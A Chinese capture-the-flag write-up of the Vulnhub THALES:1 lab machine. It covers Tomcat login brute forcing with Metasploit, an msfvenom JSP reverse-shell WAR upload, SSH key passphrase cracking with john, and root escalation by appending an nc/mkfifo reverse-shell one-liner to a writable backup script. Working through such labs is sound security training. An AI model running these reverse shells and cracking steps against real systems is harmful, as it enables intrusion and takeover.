当前位置:网站首页>【Vulnhub靶场】THALES:1
【Vulnhub靶场】THALES:1
2022-07-07 14:12:00 【Nailaoyyds】
目录
前言
描述
简介:睁开眼,换个角度
包括 2 个标志:user.txt 和 root.txt。
下载链接
https://download.vulnhub.com/thales/Thales.zip.torrent
0x00环境介绍 kali 192.168.56.102 Thales靶机 192.168.56.101
一、信息收集
0x00 arp-scan扫描
arp-scan -I eth1 -l #扫描网卡局域网
0x01 nmap扫描
扫描到两个网段 不确定是哪个 nmap 扫描扫描两个IP
开放端口22和8080
访问站点,发现需要用户名密码
二、漏洞利用
0x00 msfconsole利用
msf搜索tomcat login
配置payload
用户名 tomcat 密码 role1
成功登入
0x01 文件上传
寻找功能点,发现上传点
利用kali生成war文件木马做反弹shell msfvenom -p java/jsp_shell_reverse_tcp lhost=192.168.56.102 lport=5555 -f war -o myshell.war
上传成功,并运行
三、权限提升
0x00 反弹shell
监听端口
升级成交互式shell
sudo -l #需要密码,未知 在home文件下发现用户Thales
在`notes.txt`文件中发现`/usr/local/bin/backup.sh 查看文件内容
0x02 字典爆破
发现.ssh文件夹
发现私钥可以用ssh2john.py生成密码文件爆破
用 ssh2john.py
脚本编译一下
/usr/share/john/ssh2john.py id_rsa > crack.txt
john --wordlist=/usr/share/wordlists/rockyou.txt crack.txt
爆破出密码vodka06
切换用户
0x03 user.txt
查看user.txt---第一个flag
notes.txt是root权限的,里边可能是有东西都
0x04 反弹shell
看到backup.sh是有执行权限的,可以写入反弹shell
echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.56.102 666 >/tmp/f" >> backup.sh
文件内容编辑会直接替换,选择用追加
echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.56.102 9999 >/tmp/f" >> backup.sh
0x05 root.txt
监听9999,写入以后过一会就自己连接了
总结
Thales学到了
msf的爆破字典的使用
rsa私钥密文的利用
边栏推荐
- SysOM 案例解析:消失的内存都去哪了 !| 龙蜥技术
- three.js打造酷炫下雪效果
- AE learning 02: timeline
- Shipping companies' AI products are mature, standardized and applied on a large scale. CIMC, the global leader in port and shipping AI / container AI, has built a benchmark for international shipping
- Unity3d click events added to 3D objects in the scene
- SPI master rx time out中断
- 通知Notification使用全解析
- Markdown formula editing tutorial
- laravel怎么获取到public路径
- js中复选框checkbox如何判定为被选中
猜你喜欢
How does geojson data merge the boundaries of regions?
C4D learning notes 3- animation - animation rendering process case
Shandong old age Expo, 2022 China smart elderly care exhibition, smart elderly care and aging technology exhibition
C4D learning notes 1- animation - animation key frames
Three. JS introductory learning notes 19: how to import FBX static model
统计学习方法——感知机
航運船公司人工智能AI產品成熟化標准化規模應用,全球港航人工智能/集裝箱人工智能領軍者CIMC中集飛瞳,打造國際航運智能化標杆
Unity3D_ Class fishing project, control the distance between collision walls to adapt to different models
Unity drawing plug-in = = [support the update of the original atlas]
Strengthen real-time data management, and the British software helps the security construction of the medical insurance platform
随机推荐
统计学习方法——感知机
平衡二叉树(AVL)
You Yuxi, coming!
laravel post提交数据时显示异常
Unity的三种单例模式(饿汉,懒汉,MonoBehaviour)
PHP中exit,exit(0),exit(1),exit(‘0’),exit(‘1’),die,return的区别
Balanced binary tree (AVL)
Multiplication in pytorch: mul (), multiply (), matmul (), mm (), MV (), dot ()
laravel构造函数和中间件执行顺序问题
一个普通人除了去工厂上班赚钱,还能干什么工作?
ThinkPHP URL 路由简介
Three. JS introductory learning notes 07: external model import -c4d to JSON file for web pages -fbx import
Mysql database backup script
Enterprise log analysis system elk
Shader basic UV operations, translation, rotation, scaling
招标公告:福建省农村信用社联合社数据库审计系统采购项目(重新招标)
There are many ways to realize the pause function in JS
目标跟踪常见训练数据集格式
Shandong old age Expo, 2022 China smart elderly care exhibition, smart elderly care and aging technology exhibition
Dotween -- ease function